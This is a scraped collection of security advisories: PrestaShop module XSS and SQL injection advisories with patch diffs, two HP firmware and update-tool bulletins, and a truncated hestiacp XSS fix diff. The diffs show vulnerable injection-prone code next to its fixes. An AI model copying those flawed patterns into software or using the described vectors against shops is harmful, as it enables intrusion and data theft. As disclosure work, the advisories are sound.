qdPM 9.2 allows remote code execution by using the Add Attachments feature of Edit Project to upload a .php file to the /uploads URI.

*   *   Actions
        
        Automate any workflow
        
    *   Packages
        
        Host and manage packages
        
    *   Security
        
        Find and fix vulnerabilities
        
    *   Codespaces
        
        Instant dev environments
        
    *   Copilot
        
        Write better code with AI
        
    *   Code review
        
        Manage code changes
        
    *   Issues
        
        Plan and track work
        
    *   Discussions
        
        Collaborate outside of code
        
    

*   *   GitHub Sponsors
        
        Fund open source developers
        
    
    *   The ReadME Project
        
        GitHub community articles
        
    
*   Pricing

**Search code, repositories, users, issues, pull requests...**

**Provide feedback**

**Saved searches****Use saved searches to filter your results more quickly**

Sign up

CVE-2023-45856: Report-CVE/qdPM/9.2/RCE.md at main · SunshineOtaku/Report-CVE

Multiple Stored Cross Site Scripting (XSS) vulnerabilities in Opart opartmultihtmlblock before version 2.0.12 and Opart multihtmlblock* version 1.0.0, allows remote authenticated users to inject arbitrary web script or HTML via the body_text or body_text_rude field in /sourcefiles/BlockhtmlClass.php and /sourcefiles/blockhtml.php.

**IMPORTANT NOTICE**: DO NOT REPORT VULNERABILITIES SOLELY TO THE AUTHOR OR MARKETPLACE.

We urge you to report any vulnerabilities directly to us. Our mission is to ensure the safety and security of the PrestaShop ecosystem. Unfortunately, many module developers may not always recognize or acknowledge the vulnerabilities in their code, whether due to lack of awareness, or inability to properly evaluate the associated risk, or other reasons.

Given the rise in professional cybercrime networks actively seeking out these vulnerabilities, it's crucial that any potential threats are promptly addressed and the community is informed. The most effective method to do this is by publishing a CVE, like the one provided below.

Should you discover any vulnerabilities, **please report them to us at: report\[@\]security-presta.org**.

Every vulnerability report helps make the community more secure, and we are profoundly grateful for any information shared with us.

Multiple cross-site scripting (XSS) vulnerabilities of Type 2 (Stored XSS) B2F (Back to front) in the Multi html block (opartmultihtmlblock) module and multihtmlblock\* sub-modules from Opart for PrestaShop, prior to version 2.0.12, allows remote authenticated users to inject arbitrary web script or HTML via the body_text or body_text_rude field.

**Summary**

*   **CVE ID**: CVE-2023-30148
*   **Published at**: 2023-10-10
*   **Advisory source**: Friends-Of-Presta
*   **Platform**: PrestaShop
*   **Product**: opartmultihtmlblock and multihtmlblock\* sub-modules
*   **Impacted release**: For opartmultihtmlblock <= 2.0.11 (Fixed in 2.0.12), for multihtmlblock\* : = 1.0.0
*   **Product author**: Opart
*   **Weakness**: CWE-79
*   **Severity**: medium (6.1)

**Description**

Prior to version 2.0.12 of the Prestashop Multi html block (opartmultihtmlblock) module and multihtmlblock\* sub-modules for PrestaShop, scripts can be injected into the database by the admin configuration form or chained by an SQL injection, which can then be executed in user browsers.

**WARNING**: This vulnerability has been seen as exploited to inject malicious code into the payment page using the displayBanner hook from the multihtmlblockmessageheader sub-module (exploited by a compromised admin).

**CVSS base metrics**

*   **Attack vector**: network
*   **Attack complexity**: low
*   **Privilege required**: high
*   **User interaction**: high
*   **Scope**: unchanged
*   **Confidentiality**: high
*   **Integrity**: high
*   **Availability**: none

**Vector string**: CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:U/C:H/I:H/A:N

**Possible malicious usage**

*   Hijack payment modules
*   Redirect users to another website
*   Technical and personal data leaks

**Patch**

Patches listed below will:

1.  Sanitize the admin form (removing scripts thanks to isCleanHtml validate, and removing iframes is not authorized in HTML fields
2.  Sanitize the string saved in the database before displaying it (to disable corrupted data from SQL injections)

Please note that these patches should be applied to the main module opartmultihtmlblock and all multihtmlblock\* sub-modules. For the main module, the component to modify is the class BlockhtmlClass in sourcefiles directory and well as the main class Blockhtml, and for the sub-modules, the component to edit is the Multihtmlblock*Class as well as the main class Multihtmlblock*

    --- a/sourcefiles/BlockhtmlClass.php
    +++ b/sourcefiles/BlockhtmlClass.php
    @@ -62,8 +62,8 @@ class %Modulename%Class extends ObjectModel
                    'fields' => array(
                            'id_shop' =>                            array('type' => self::TYPE_INT, 'validate' => 'isunsignedInt', 'required' => true),
                            // Lang fields
    -                       'body_text' =>                  array('type' => self::TYPE_HTML, 'lang' => true, 'validate' => 'isString'),
    -                        'body_text_rude' =>            array('type' => self::TYPE_HTML, 'lang' => true, 'validate' => 'isString'),
    +                       'body_text' =>                  array('type' => self::TYPE_HTML, 'lang' => true, 'validate' => 'isCleanHtml'),
    +                        'body_text_rude' =>            array('type' => self::TYPE_HTML, 'lang' => true, 'validate' => 'isCleanHtml'),
                             'all_pages' => array('type' => self::TYPE_BOOL, 'validate' => 'isBool'),
                             'show_on_home' =>            array('type' => self::TYPE_STRING, 'validate' => 'isBool'),
                             'category_id' =>            array('type' => self::TYPE_STRING, 'validate' => 'isString'),
    

    --- a/sourcefiles/blockhtml.php
    +++ b/sourcefiles/blockhtml.php
    @@ -384,9 +384,27 @@ class %Modulename% extends Module
                                 $blockhtml=new %Modulename%Class();
                                 $blockhtml->id_shop=$id_shop;                                
                                 $blockhtml->copyFromPost();
    +                            // Validate if our html fields contains an iframe
    +                            $isIframeValidated = $this->validateIframe($blockhtml->body_text);
    +                            $isIframeValidated = $isIframeValidated ?
    +                                $this->validateIframe($blockhtml->body_text_rude) :
    +                                $isIframeValidated;
    +                            if (!$isIframeValidated) {
    +                                // There is an iframe that is not allowed, we stop here
    +                                return false;
    +                            }
                                 $blockhtml->save();
                            }
                             $blockhtml->copyFromPost();
    +                        // Validate if our html fields contains an iframe
    +                        $isIframeValidated = $this->validateIframe($blockhtml->body_text);
    +                        $isIframeValidated = $isIframeValidated ?
    +                            $this->validateIframe($blockhtml->body_text_rude) :
    +                            $isIframeValidated;
    +                        if (!$isIframeValidated) {
    +                            // There is an iframe that is not allowed, we stop here
    +                            return false;
    +                        }
                             $blockhtml->update();
                             
                            $this->messages[]=$this->l('Block successfuly update');
    @@ -395,6 +413,25 @@ class %Modulename% extends Module
                    }
            }
     
    +    /**
    +     * Validate a string depending if iframes are allowed in HTML fields
    +     *
    +     * @param string $htmlBody
    +     *
    +     * @return bool
    +     */
    +    protected function validateIframe($htmlBody)
    +    {
    +        foreach ($htmlBody as $stringToValidate) {
    +            if (!Configuration::get('PS_ALLOW_HTML_IFRAME') &&
    +                preg_match('/<iframe.*src=\"(.*)\".*><\/iframe>/isU', $stringToValidate)) {
    +                $this->erreurs[] = $this->trans('To use <iframe>, enable the feature in Shop Parameters > General');
    +                return false;
    +            }
    +        }
    +        return true;
    +    }
    +
             private function getIsInArray($controller_name,$obj_value,$the_get) {
                 if(get_class($this->context->controller)==$controller_name && $obj_value != "") {
                     $id_array = explode(',',$obj_value);
    @@ -478,7 +515,10 @@ class %Modulename% extends Module
                     
                     if(!$this->displayAllowed($blockhtml))
                         return false;
    -                
    +        // Remove all scripts tags (including inline scripts)
    +        $blockhtml->body_text_rude = $this->sanatizeHtmlForDisplay($blockhtml->body_text_rude);
    +        $blockhtml->body_text = $this->sanatizeHtmlForDisplay($blockhtml->body_text);
    +
                    $this->smarty->assign(array(
                            'blockhtml' => $blockhtml,
                            'default_lang' => (int)$this->context->language->id,
    @@ -495,6 +535,68 @@ class %Modulename% extends Module
                         return $this->display(__FILE__, 'views/templates/ps17/blockhtml.tpl');
            }
            
    +    /**
    +     * Remove JavaScript from HTML
    +     * Credit to : https://www.mradeveloper.com/blog/remove-javascript-from-html-with-php
    +     *
    +     * @param string $inputP
    +     *
    +     * @return string sanatized HTML
    +     */
    +    protected function sanatizeHtmlForDisplay($inputP)
    +    {
    +        $spaceDelimiter = "#BLANKSPACE#";
    +        $newLineDelimiter = "#NEWLNE#";
    +                                    
    +        $inputArray = [];
    +        $minifiedSanitized = '';
    +        $unMinifiedSanitized = '';
    +        $sanitizedInput = [];
    +        $returnData = [];
    +        $returnType = "string";
    +
    +        if($inputP === null) return null;
    +        if($inputP === false) return false;
    +        if(is_array($inputP) && sizeof($inputP) <= 0) return [];
    +
    +        if (is_array($inputP)) {
    +            $inputArray = $inputP;
    +            $returnType = "array";
    +        } else {
    +            $inputArray[] = $inputP;
    +            $returnType = "string";
    +        }
    +
    +        foreach($inputArray as $input)
    +        {
    +            $minified = str_replace(" ",$spaceDelimiter,$input);
    +            $minified = str_replace("\n",$newLineDelimiter,$minified);
    +
    +            //removing <script> tags
    +            $minifiedSanitized = preg_replace("/[<][^<]*script.*[>].*[<].*[\/].*script*[>]/i","",$minified);
    +
    +            $unMinifiedSanitized = str_replace($spaceDelimiter," ",$minifiedSanitized);
    +            $unMinifiedSanitized = str_replace($newLineDelimiter,"\n",$unMinifiedSanitized);
    +
    +            //removing inline js events
    +            $unMinifiedSanitized = preg_replace("/([ ]on[a-zA-Z0-9_-]{1,}=\".*\")|([ ]on[a-zA-Z0-9_-]{1,}='.*')|([ ]on[a-zA-Z0-9_-]{1,}=.*[.].*)/","",$unMinifiedSanitized);
    +
    +            //removing inline js
    +            $unMinifiedSanitized = preg_replace("/([ ]href.*=\".*javascript:.*\")|([ ]href.*='.*javascript:.*')|([ ]href.*=.*javascript:.*)/i","",$unMinifiedSanitized);
    +
    +                                        
    +            $sanitizedInput[] = $unMinifiedSanitized;
    +        }
    +
    +        if ($returnType == "string" && sizeof($sanitizedInput) > 0) {
    +            $returnData = $sanitizedInput[0];
    +        } else {
    +            $returnData = $sanitizedInput;
    +        }
    +                                    
    +        return $returnData;
    +    }
    +    
            public function hookDisplayTop($param)  {
                    return $this->hookDisplayLeftColumn($param);
            }
    

**Other recommendations**

*   It’s recommended to upgrade to the latest version of the module
*   To mitigate potential issues arising from credential leaks, enforce mandatory 2FA for backoffice logins. This will necessitate the integration of a 2FA module.

**Timeline**

Date

Action

2023-02-10

First exploit detected in server logs

2023-03-11

Discovery and POC of the vulnerability by Profileo

2023-03-12

Contacting the editor

2023-03-14

Editor confirmed the vulnerability and is planning a new release of the module

2023-03-15

First patch (2.0.11) of the module suggested. Additional fixes were required

2023-03-15

New release of the module (2.0.12)

2023-04-03

The editor communicated with known customers concerning the vulnerability

2023-04-21

CVE ID Received

2023-10-10

Publishing this security advisory

**Links**

*   Editor Website store-opart
*   National Vulnerability Database

**DISCLAIMER:** _The French Association Friends Of Presta (FOP) acts as an intermediary to help hosting this advisory. While we strive to ensure the information and advice provided are accurate, FOP cannot be held liable for any consequences arising from reported vulnerabilities or any subsequent actions taken._

CVE-2023-30148: [CVE-2023-30148] Multiple cross-site scripting (XSS) vulnerabilities in the Multi html block (opartmultihtmlblock) module and multihtmlblock* sub-modules from Opart for PrestaShop

Multiple improper neutralization of SQL parameters in module AfterMail (aftermailpresta) for PrestaShop, before version 2.2.1, allows remote attackers to perform SQL injection attacks via `id_customer`, `id_conf`, `id_product` and `token` parameters in `aftermailajax.php via the 'id_product' parameter in hooks DisplayRightColumnProduct and DisplayProductButtons.

**IMPORTANT NOTICE**: DO NOT REPORT VULNERABILITIES SOLELY TO THE AUTHOR OR MARKETPLACE.

We urge you to report any vulnerabilities directly to us. Our mission is to ensure the safety and security of the PrestaShop ecosystem. Unfortunately, many module developers may not always recognize or acknowledge the vulnerabilities in their code, whether due to lack of awareness, or inability to properly evaluate the associated risk, or other reasons.

Given the rise in professional cybercrime networks actively seeking out these vulnerabilities, it's crucial that any potential threats are promptly addressed and the community is informed. The most effective method to do this is by publishing a CVE, like the one provided below.

Should you discover any vulnerabilities, **please report them to us at: report\[@\]security-presta.org**.

Every vulnerability report helps make the community more secure, and we are profoundly grateful for any information shared with us.

Multiple SQL injection vulnerabilities in the AfterMail (aftermailpresta) module from Shoprunners for PrestaShop, prior to version 2.2.1, allows remote attackers to execute arbitrary SQL commands via the id_customer, id_conf, id_product or token parameter in aftermailajax.php and via the id_product parameter in hooks DisplayRightColumnProduct and DisplayProductButtons.

**Summary**

*   **CVE ID**: CVE-2023-30154
*   **Published at**: 2023-10-10
*   **Advisory source**: Friends-Of-Presta
*   **Platform**: PrestaShop
*   **Product**: aftermailpresta
*   **Impacted release**: < 2.2.1 (fixed in 2.2.1)
*   **Product author**: Shoprunners
*   **Weakness**: CWE-89
*   **Severity**: critical (9.8)

**Description**

In the AfterMail (aftermailpresta) module for PrestaShop, multiple vulnerabilities can be exploited in versions prior to 2.2.1:

*   An HTTP request can be manipulated using the id_customer, id_conf, id_product or token GET parameters, in the /modules/aftermailpresta/aftermailajax.php endpoint, enabling a remote attacker to perform a SQL injection.
*   An HTTP request can be manipulated using id_product GET parameter, in the /modules/aftermailpresta/aftermailpresta.php endpoint (in DisplayRightColumnProduct and DisplayProductButtons hooks), enabling a remote attacker to perform a SQL injection.

Since one of these vulnerabilities relies on PrestaShop’s hooks system, this will, by design, hide the module path. As a result, conventional frontend logs won’t reveal that this vulnerability is being exploited. Only POST /{product_path} or GET /{product_path} will be visible in logs. Activating the AuditEngine of mod\_security (or similar) is the only way to get data to confirm this exploit.

These issues are fixed in version 2.2.1, published in September 2022.

**CVSS base metrics**

*   **Attack vector**: network
*   **Attack complexity**: low
*   **Privilege required**: none
*   **User interaction**: none
*   **Scope**: unchanged
*   **Confidentiality**: high
*   **Integrity**: high
*   **Availability**: high

**Vector string**: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

**Possible malicious usage**

*   Obtain admin access
*   Remove data from the associated PrestaShop
*   Copy/paste data from sensitive tables to FRONT to expose tokens and unlock admins’s ajax scripts
*   Rewrite SMTP settings to hijack emails

**Patch**

Multiple SQL injections fixed in aftermailajax.php:

    --- modules/aftermailpresta/aftermailajax.php
    +++ modules/aftermailpresta/aftermailajax.php
    @@ -45,7 +45,7 @@ function subscribe()
         $id_conf = Tools::getValue('id_conf');
         $id_customer = Context::getContext()->customer->id;
         
    -    $result = Db::getInstance()->ExecuteS('SELECT * FROM `' . _DB_PREFIX_ . 'aftermail_queue` ' . 'WHERE id_product = ' . $id_product . ' AND id_customer = ' . $id_customer);
    +    $result = Db::getInstance()->ExecuteS('SELECT * FROM `' . _DB_PREFIX_ . 'aftermail_queue` ' . 'WHERE id_product = ' . (int)$id_product . ' AND id_customer = ' . (int)$id_customer);
         $taken = false;
         $saved = false;
         if (empty($result)) {
    @@ -74,7 +74,7 @@ function unsubscribe()
         
         $token = Tools::getValue('token');
         
    -    $success = Db::getInstance()->execute('DELETE FROM `' . _DB_PREFIX_ . 'aftermail_queue` WHERE id_product = ' . $id_product . ' AND id_customer = ' . $id_customer . ' AND id_aftermail_conf = ' . $id_conf . ' AND unsubscribe = "' . $token . '"');
    +    $success = Db::getInstance()->execute('DELETE FROM `' . _DB_PREFIX_ . 'aftermail_queue` WHERE id_product = ' . (int)$id_product . ' AND id_customer = ' . (int)$id_customer . ' AND id_aftermail_conf = ' . (int)$id_conf . ' AND unsubscribe = "' . pSQL($token) . '"');
         $rows = Db::getInstance()->Affected_Rows();
         
         $mod = new AfterMailPresta();
    @@ -91,7 +91,7 @@ function unsubscribeAll()
         $id_customer = Tools::getValue('customer_id');
         $token = Tools::getValue('token');
         
    -    $success = Db::getInstance()->execute('DELETE FROM `' . _DB_PREFIX_ . 'aftermail_queue` WHERE id_customer = ' . $id_customer . ' AND unsubscribe_all = "' . $token . '"');
    +    $success = Db::getInstance()->execute('DELETE FROM `' . _DB_PREFIX_ . 'aftermail_queue` WHERE id_customer = ' . (int)$id_customer . ' AND unsubscribe_all = "' . pSQL($token) . '"');
         $rows = Db::getInstance()->Affected_Rows();
         
         $mod = new AfterMailPresta();
    
    

SQL injection fixed in aftermailpresta.php:

    --- modules/aftermailpresta/aftermailpresta.php
    +++ modules/aftermailpresta/aftermailpresta.php
    @@ -888,7 +888,7 @@ class AftermailPresta extends Module
                     $ids = explode(',', $row['subscribe_ids']);
                     foreach ($ids as $id) {
                         if ($row['subscribe_ids'] == '0' || trim($id) === Tools::getValue("id_product")) {
    -                        $result2 = Db::getInstance()->ExecuteS('SELECT * FROM `' . _DB_PREFIX_ . 'aftermail_queue` ' . 'WHERE id_product = ' . Tools::getValue("id_product") . ' AND id_customer = ' . $this->context->customer->id);
    +                        $result2 = Db::getInstance()->ExecuteS('SELECT * FROM `' . _DB_PREFIX_ . 'aftermail_queue` ' . 'WHERE id_product = ' . (int)Tools::getValue("id_product") . ' AND id_customer = ' . $this->context->customer->id);
                             if (empty($result2)) {
                                 // 2. get frequencies
                                 $frequencies = explode(',', $row['reminder_frequency']);
    

**Other recommendations**

*   It’s **highly recommended to upgrade the module** to the latest version or to **delete** the module if unused.
*   Upgrade PrestaShop to the latest version to disable multiquery executions (separated by “;”) - be warned that this functionality **WILL NOT** protect your SHOP against injection SQL which uses the UNION clause to steal data.
*   Change the default database prefix ps_ with a new longer, arbitrary prefix. Nevertheless, be warned that this is useless against blackhats with DBA senior skills because of a design vulnerability in DBMS
*   Activate OWASP 942’s rules on your WAF (Web application firewall), be warned that you will probably break your backoffice and you will need to pre-configure some bypasses against this set of rules.

**Timeline**

Date

Action

2022-09-10

Discovery of the vulnerability by Profileo.com

2022-09-10

Contacting the author of the module to notify him about the discovery

2022-09-10

The author confirmed the vulnerability and released the version 2.2.1

2023-04-02

Contact the author back to clarify changes in the published version

2023-04-21

Receiving the CVE ID from Mitre

2023-08-20

Contact PrestaShop to clarify changes in the published version

2023-08-21

Contact the author to notify him about the upcoming publication

2023-10-10

Publication of this security advisory

**Links**

*   AfterMail Module
*   National Vulnerability Database CVE-2023-30154

**DISCLAIMER:** _The French Association Friends Of Presta (FOP) acts as an intermediary to help hosting this advisory. While we strive to ensure the information and advice provided are accurate, FOP cannot be held liable for any consequences arising from reported vulnerabilities or any subsequent actions taken._

CVE-2023-30154: [CVE-2023-30154] Improper neutralization of SQL parameters in AfterMail (aftermailpresta) module from Shoprunners for PrestaShop

HP is aware of a potential security vulnerability in HP t430 and t638 Thin Client PCs. These models may be susceptible to a physical attack, allowing an untrusted source to tamper with the system firmware using a publicly disclosed private key. HP is providing recommended guidance for customers to reduce exposure to the potential vulnerability.

HP is aware of a potential security vulnerability in HP t430 and t638 Thin Client PCs. These models may be susceptible to a physical attack, allowing an untrusted source to tamper with the system firmware using a publicly disclosed private key. HP is providing recommended guidance for customers to reduce exposure to the potential vulnerability.

Severity

High

HP Reference

HPSBHF03873 Rev. 1

Release date

October 13, 2023

Last updated

October 13, 2023

Category

PC

Potential Security Impact

Escalation of Privilege, Arbitrary Code Execution, and Denial of Service

**Summary**

For HP t430 and t638 Thin Clients PCs manufactured before July 2023, a private firmware key has been disclosed, potentially allowing an untrusted source to tamper with system firmware. HP has not identified any active exploits related to this vulnerability, which requires physical access to the system.

HP t430 and t638 Thin Client BIOS images are signed with undisclosed HP-unique keys protected by a Hardware Security Module. This BIOS image key provides additional protections that maintain integrity for BIOS updates and normal system usage.

**Relevant Common Vulnerabilities and Exposures (CVE) List**

Reported by Binarly REsearch Team

List of CVE IDs   

CVE ID

CVS 3.0

Vector

CVE-2023-5409

7.3

CVSS:3.1/AV:P/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H

Learn more about CVSS 3.0 base metrics, which range from 0 to 10.

PSR-2023-0087

**Resolution**

HP recommends that customers implement these recommendations to mitigate their exposure to the identified vulnerability.

*   **Limit Physical Access to Devices**: Customers should limit physical access to their devices as a precautionary measure.
    
*   **Update BIOS Using Firmware from HP**: Customers should only update devices with firmware provided directly from HP or its website.
    
*   **Enable BIOS Admin/Setup Password**: As a standard practice, HP recommends that all customers create a primary Admin account and password for each affected device. This will help protect against unintended access to the BIOS.
    
*   **Disable USB Ports During Boot Process**: Customers should disable the USB Storage Boot BIOS setting to prevent unauthorized users from booting to and installing malicious software. This can be disabled manually in the BIOS startup menu; via running a script in HP Device Manager or another endpoint management software; or via custom BIOS firmware updates.
    

Newer versions may become available, and the minimum versions listed below may become obsolete.  If a SoftPaq Link becomes invalid, check the HP Customer Support - Software and Driver Downloads site to obtain the latest update for your product model.

HP recommends keeping your system up to date with the latest firmware and software.

Note:

This bulletin may be updated when new information and/or SoftPaqs are available. Sign up for HP Subscriptions to be notified and receive:

*   Product support eAlerts
    
*   Driver updates
    
*   Security Bulletin updates
    

**Affected products**

Identify the affected products.

**Revision history**

This document has been revised according to the information below.

List of versions   

Version

Description

Date

1

Initial Release

October 13, 2023

**Additional information**

Follow these links for additional information.

Third-party security patches

Third party security patches that are to be installed on systems running HP software products should be applied in accordance with the customer's patch management policy.

Support

For issues about implementing the recommendations of this Security Bulletin, visit http://www.hp.com/go/contacthp to learn about your HP support options.

Report

To report a potential security vulnerability with any HP supported product, send email to: hp-security-alert@hp.com.

Subscribe

To initiate a subscription to receive future HP Security Bulletin alerts via email, visit https://h41369.www4.hp.com/alerts-signup.php?lang=en&cc=US&jumpid=hpsc\_profile.

Security bulletin archive

To view released Security Bulletins, visit https://support.hp.com/security-bulletins.

It is strongly recommended that security related information being communicated to HP be encrypted using PGP, especially exploit information.

Download HP’s security-alert PGP key

**Legal information**

System management and security procedures must be reviewed frequently to maintain system integrity. HP is continually reviewing and enhancing the security features of software products to provide customers with current secure solutions.

HP is broadly distributing this Security Bulletin in order to bring to the attention of users of the affected HP products the important security information contained in this Security Bulletin. HP recommends that all users determine the applicability of this information to their individual situations and take appropriate action. HP does not warrant that this information is necessarily accurate or complete for all user situations and, consequently, HP will not be responsible for any damages resulting from user's use or disregard of the information provided in this Security Bulletin. To the extent permitted by law, HP disclaims all warranties, either express or implied, including the warranties of merchantability and fitness for a particular purpose, title and non-infringement.

© Copyright 2023 HP Development Company, L.P.

HP Inc. (HP) shall not be liable for technical or editorial errors or omissions contained herein. The information provided is provided "as is" without warranty of any kind. To the extent permitted by law, neither HP nor its affiliates, subcontractors or suppliers will be liable for incidental, special or consequential damages including downtime cost; lost profits; damages relating to the procurement of substitute products or services; or damages for loss of data, or software restoration. The information in this document is subject to change without notice. "HP Inc.," "HP" and the names of HP products referenced herein are trademarks of HP Inc. or its affiliates in the United States and other countries. Other product and company names mentioned herein may be trademarks of their respective owners.

CVE-2023-5409: HP t430 and t638 Thin Clients - Firmware Tampering Vulnerability

A potential security vulnerability has been identified in the HP ThinUpdate utility (also known as HP Recovery Image and Software Download Tool) which may lead to information disclosure. HP is releasing mitigation for the potential vulnerability.

A potential security vulnerability has been identified in the HP ThinUpdate utility (also known as HP Recovery Image and Software Download Tool) which may lead to information disclosure. HP is releasing mitigation for the potential vulnerability.

Severity

Medium

HP Reference

HPSBHF03872 Rev. 1

Release date

October 13, 2023

Last updated

October 13, 2023

Category

Potential Security Impact

PC

**Relevant Common Vulnerabilities and Exposures (CVE) List**

Reported by Narumi Hirai of LAC Co., Ltd.

List of CVE IDs   

CVE ID

CVS 3.0

Vector

CVE-2023-4499

4.8

CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:N

Learn more about CVSS 3.0 base metrics, which range from 0 to 10.

PSR-2023-0089

**Resolution**

HP ThinUpdate version 2.7.15 has been updated to enforce certificate checking on all file downloads. HP recommends updating to HP ThinUpdate version 2.7.15 or later to mitigate this potential vulnerability.

Use one of the following methods to update HP ThinUpdate utility.

*   **Method 1**: Self-update via the HP ThinUpdate utility.
    
    When ThinUpdate is executed (opened) it will automatically check for a newer version and request the user to perform an update. HP recommends that customers select Yes to download and install the update.
    
*   **Method 2**: Manual installation of HP ThinUpdate utility.
    
    HP has identified affected platforms and corresponding HP ThinUpdate SoftPaqs available for download. See the affected platforms listed below.
    

Newer versions may become available, and the minimum versions listed below may become obsolete.  If a SoftPaq Link becomes invalid, check the HP Customer Support - Software and Driver Downloads site to obtain the latest update for your product model.

HP recommends keeping your system up to date with the latest firmware and software.

Note:

This bulletin may be updated when new information and/or SoftPaqs are available. Sign up for HP Subscriptions to be notified and receive:

*   Product support eAlerts
    
*   Driver updates
    
*   Security Bulletin updates
    

**Softpaqs and affected products**

Find the SoftPaq that resolves the vulnerability of your system.

A status is provided if no SoftPaq is listed for a particular product.

*   Pending: SoftPaq is in progress.
    
*   Under investigation: System under investigation for impact, or the SoftPaq is under investigation for feasibility/availability.
    
*   Not available: SoftPaq not available due to technical or logistical constraints.
    
*   Check Support Page: The listed SoftPaq has been removed from the download site.
    
*   SoftPaqs with newer versions may be available on the HP Customer Support - Software and Driver Downloads site.
    

**Affected products**

Identify the affected products.

**Revision history**

This document has been revised according to the information below.

List of versions   

Version

Description

Date

1

Initial Release

October 13, 2023

**Additional information**

Follow these links for additional information.

Third-party security patches

Third party security patches that are to be installed on systems running HP software products should be applied in accordance with the customer's patch management policy.

Support

For issues about implementing the recommendations of this Security Bulletin, visit http://www.hp.com/go/contacthp to learn about your HP support options.

Report

To report a potential security vulnerability with any HP supported product, send email to: hp-security-alert@hp.com.

Subscribe

To initiate a subscription to receive future HP Security Bulletin alerts via email, visit https://h41369.www4.hp.com/alerts-signup.php?lang=en&cc=US&jumpid=hpsc\_profile.

Security bulletin archive

To view released Security Bulletins, visit https://support.hp.com/security-bulletins.

It is strongly recommended that security related information being communicated to HP be encrypted using PGP, especially exploit information.

Download HP’s security-alert PGP key

**Legal information**

System management and security procedures must be reviewed frequently to maintain system integrity. HP is continually reviewing and enhancing the security features of software products to provide customers with current secure solutions.

HP is broadly distributing this Security Bulletin in order to bring to the attention of users of the affected HP products the important security information contained in this Security Bulletin. HP recommends that all users determine the applicability of this information to their individual situations and take appropriate action. HP does not warrant that this information is necessarily accurate or complete for all user situations and, consequently, HP will not be responsible for any damages resulting from user's use or disregard of the information provided in this Security Bulletin. To the extent permitted by law, HP disclaims all warranties, either express or implied, including the warranties of merchantability and fitness for a particular purpose, title and non-infringement.

© Copyright 2023 HP Development Company, L.P.

HP Inc. (HP) shall not be liable for technical or editorial errors or omissions contained herein. The information provided is provided "as is" without warranty of any kind. To the extent permitted by law, neither HP nor its affiliates, subcontractors or suppliers will be liable for incidental, special or consequential damages including downtime cost; lost profits; damages relating to the procurement of substitute products or services; or damages for loss of data, or software restoration. The information in this document is subject to change without notice. "HP Inc.," "HP" and the names of HP products referenced herein are trademarks of HP Inc. or its affiliates in the United States and other countries. Other product and company names mentioned herein may be trademarks of their respective owners.

CVE-2023-4499: HP ThinUpdate - Improper Certificate Validation

Cross-site Scripting (XSS) - Stored in GitHub repository hestiacp/hestiacp prior to 1.8.6.

Expand Up @@ -512,7 +512,7 @@ class="form-control js-password-input" class\="form-control" name\="v\_mysql\_url" id\="v\_mysql\_url" value\="<?= $\_SESSION\["DB\_PMA\_ALIAS"\] ?>" value\="<?= htmlentities($\_SESSION\["DB\_PMA\_ALIAS"\]); ?>" \> </div\> <div class\="u-mb10"\> Expand Down Expand Up @@ -618,7 +618,7 @@ class="form-control" <label for\="v\_pgsql\_url" class\="form-label"\> <?= \_("phpPgAdmin Alias") ?> </label\> <input type\="text" class\="form-control" name\="v\_pgsql\_url" id\="v\_pgsql\_url" value\="<?= $\_SESSION\["DB\_PGA\_ALIAS"\] ?>"\> <input type\="text" class\="form-control" name\="v\_pgsql\_url" id\="v\_pgsql\_url" value\="<?= htmlentities($\_SESSION\["DB\_PGA\_ALIAS"\]) ?>"\> </div\> <?php } ?> <?php if ($v\_pgsql == "yes") { Expand Down Expand Up @@ -727,7 +727,7 @@ class="u-ml5" class\="form-control" name\="v\_backup\_dir" id\="v\_backup\_dir" value\="<?= trim($v\_backup\_dir, "'") ?>" value\="<?= htmlentities(trim($v\_backup\_dir, "'")) ?>" disabled \> </div\> Expand Down Expand Up @@ -785,7 +785,7 @@ class="form-select" class\="form-control" name\="v\_backup\_host" id\="v\_backup\_host" value\="<?= trim($v\_backup\_host, "'") ?>" value\="<?= htmlentities(trim($v\_backup\_host, "'")) ?>" \> </div\> <div class\="u-mb20"\> Expand All @@ -797,7 +797,7 @@ class="form-control" class\="form-control" name\="v\_backup\_port" id\="v\_backup\_port" value\="<?= trim($v\_backup\_port, "'") ?>" value\="<?= htmlentities(trim($v\_backup\_port, "'")) ?>" \> </div\> <div class\="u-mb10"\> Expand All @@ -809,7 +809,7 @@ class="form-control" class\="form-control" name\="v\_backup\_username" id\="v\_backup\_username" value\="<?= trim($v\_backup\_username, "'") ?>" value\="<?= htmlentities(trim($v\_backup\_username, "'")) ?>" \> </div\> <div class\="u-mb20"\> Expand All @@ -822,7 +822,7 @@ class="form-control" class\="form-control js-password-input" name\="v\_backup\_password" id\="v\_backup\_password" value\="<?= trim($v\_backup\_password, "'") ?>" value\="<?= htmlentities(trim($v\_backup\_password, "'")) ?>" \> </div\> </div\> Expand All @@ -835,7 +835,7 @@ class="form-control js-password-input" class\="form-control" name\="v\_backup\_bpath" id\="v\_backup\_bpath" value\="<?= trim($v\_backup\_bpath, "'") ?>" value\="<?= htmlentities(trim($v\_backup\_bpath, "'")) ?>" \> </div\> </div\> Expand All @@ -849,7 +849,7 @@ class="form-control" class\="form-control" name\="v\_backup\_bucket" id\="v\_backup\_bucket" value\="<?= trim($v\_backup\_bucket, "'") ?>" value\="<?= htmlentities(trim($v\_backup\_bucket, "'")) ?>" \> </div\> <div class\="u-mb10"\> Expand All @@ -861,7 +861,7 @@ class="form-control" class\="form-control" name\="v\_backup\_application\_id" id\="v\_backup\_application\_id" value\="<?= trim($v\_backup\_application\_id, "'") ?>" value\="<?= htmlentities(trim($v\_backup\_application\_id, "'")) ?>" \> </div\> <div class\="u-mb10"\> Expand All @@ -873,7 +873,7 @@ class="form-control" class\="form-control" name\="v\_backup\_application\_key" id\="v\_backup\_application\_key" value\="<?= trim($v\_backup\_application\_key, "'") ?>" value\="<?= htmlentities(trim($v\_backup\_application\_key, "'")) ?>" \> </div\> </div\> Expand All @@ -887,7 +887,7 @@ class="form-control" class\="form-control" name\="v\_rclone\_host" id\="v\_rclone\_host" value\="<?= trim($v\_rclone\_host, "'") ?>" value\="<?= htmlentities(trim($v\_rclone\_host, "'")) ?>" \> </div\> <div class\="u-mb10"\> Expand All @@ -899,7 +899,7 @@ class="form-control" class\="form-control" name\="v\_rclone\_path" id\="v\_rclone\_path" value\="<?= 